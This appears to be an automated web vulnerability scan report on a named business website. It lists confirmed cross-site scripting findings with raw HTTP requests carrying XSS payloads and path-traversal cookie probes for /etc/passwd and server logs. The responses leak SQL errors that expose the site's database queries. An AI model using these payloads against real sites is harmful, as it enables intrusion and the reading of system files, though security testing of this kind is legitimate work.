<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013A8)%3C/script%3E

/ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013A8)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Csc..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013A8)</script>

Request

GET /ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013A8)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lta8p7f52g2ep0t2dkrdqdq583; path=/
Content-Length: 3123
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B9)%3C/script%3E

/ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B9)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013B9)</script>

Request

GET /ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013B9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/css/newlanding_style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f8vg8kbcoecl1g3vkpvku937d3; path=/
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


